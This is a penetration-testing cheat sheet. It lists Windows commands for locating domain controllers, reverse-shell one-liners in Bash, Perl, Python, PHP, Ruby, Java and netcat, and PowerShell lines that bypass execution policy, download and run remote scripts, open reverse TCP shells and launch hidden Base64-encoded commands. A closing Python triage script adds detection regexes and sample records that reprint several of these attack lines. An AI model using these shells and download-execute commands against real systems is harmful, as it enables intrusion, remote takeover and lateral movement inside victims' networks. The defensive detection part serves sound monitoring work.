Common methods for searching for domain controllers
1. net view
net view /domain
2. set log
set log
(prints the environment variables whose names start with LOG, including LOGONSERVER, the domain controller that authenticated the current session)
3. Query the DNS SRV records
nslookup -type=SRV _ldap._tcp.corp
4. Use nltest
nltest /dclist:corp
5. Use dsquery
dsquery server -domain corp
6. Use netdom
netdom query pdc
These are all built-in Windows commands. Because some of them are missing on certain Windows versions, knowing more than one method gives one more chance of success.
One-liner reverse shells in various languages
Bash (not universal; it depends on the Linux distribution, and was tested successfully on Ubuntu)
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby
ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
netcat
nc -e /bin/sh x.x.x.x 2333
However, some nc builds (the non-traditional versions) do not have the -e option; in that case the following named-pipe construction solves the problem:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 2333 >/tmp/f
Commonly used PowerShell commands
1. Download and run a script remotely
Set-ExecutionPolicy RemoteSigned
IEX (New-Object System.Net.WebClient).DownloadString('raw.githubusercontent.com/besimorhino…')
2. Copy the PS script to the local machine and run it
powershell.exe -ep Bypass -File d:\powercat.ps1
3. Local interactive execution
E:\> powershell.exe -ExecutionPolicy Bypass Invoke-PowerShellTcp -Reverse -IPAddress 10.18.180.18 -Port 4444
4. Run a Base64-encoded PS script
powershell -ep bypass -NoLogo -NonInteractive -noprofile -windowstyle Hidden -enc <base64>
where <base64> is the Base64-encoded (UTF-16LE) command text.
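From the defender's side, the three groups above (domain controller discovery commands, reverse-shell one-liners, encoded PowerShell launches) are exactly what process-creation telemetry should be watched for. The following Python triage script is an added example, not part of the original cheat sheet: it tags constructed "image|command line" records using the patterns this page lists and decodes the -enc payload so the plaintext can be inspected. The record format, tag names, sample lines and placeholder URL are all assumptions.

```python
import base64
import re

# Detection rules keyed on the command patterns listed on this page (one regex per family).
RULES = [
    ("dc-discovery", re.compile(
        r"\bnet\s+view\s+/domain\b|\bnltest\b.*?/dclist|-type=srv\s+_ldap\._tcp|"
        r"\bdsquery\s+server\b|\bnetdom\s+query\s+pdc\b|\bset\s+log\b", re.I)),
    ("reverse-shell", re.compile(
        r"/dev/tcp/|\bnc\b.*\s-e\s+/bin/sh|mkfifo\s+\S+.*\|\s*nc\b|socket\.socket\(.*dup2\(|"
        r"TCPSocket\.open\(.*exec\b|fsockopen\(.*exec\(", re.I)),
]
# -EncodedCommand and its abbreviations (-e, -ec, -en, -enc) plus a Base64 blob; "-ep bypass" does not match.
ENCODED_ARG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
SUSPICIOUS_PS = ("iex", "invoke-expression", "downloadstring", "invoke-powershelltcp")

def decode_encoded_command(blob):
    """-EncodedCommand carries the script as Base64 over UTF-16LE; return the text or None."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except ValueError:  # bad Base64, wrong padding, or an odd byte count (truncated UTF-16)
        return None

def classify(command_line):
    """Return the sorted list of tags that fire for one process command line."""
    tags = {tag for tag, rx in RULES if rx.search(command_line)}
    m = ENCODED_ARG.search(command_line)
    if m:
        tags.add("ps-encoded")
        decoded = decode_encoded_command(m.group(1))
        if decoded and any(s in decoded.lower() for s in SUSPICIOUS_PS):
            tags.add("ps-encoded-download-or-exec")
    return sorted(tags)

def scan(events):
    """Constructed 'image|command line' records in; (command line, tags) out for hits only."""
    return [(c, classify(c)) for c in (e.partition("|")[2] for e in events) if classify(c)]

# Constructed sample records, not real telemetry; the URL is a placeholder.
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    "cmd.exe|net view /domain",
    "cmd.exe|nltest /dclist:corp",
    "cmd.exe|nslookup -type=SRV _ldap._tcp.corp",
    "bash|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 2333 >/tmp/f",
    "explorer.exe|powershell -ep bypass -NoLogo -NonInteractive -noprofile -windowstyle Hidden -enc " + ENCODED,
    "explorer.exe|powershell -ep bypass -enc QUJDREVGR0hJSktMTQ==",  # 13 bytes: not valid UTF-16LE
    "explorer.exe|notepad.exe C:\\notes.txt",
]
```

The second encoded sample shows the failure mode a rule must tolerate: a blob that is valid Base64 but not valid UTF-16LE is still reported as an encoded launch, just without a decoded preview.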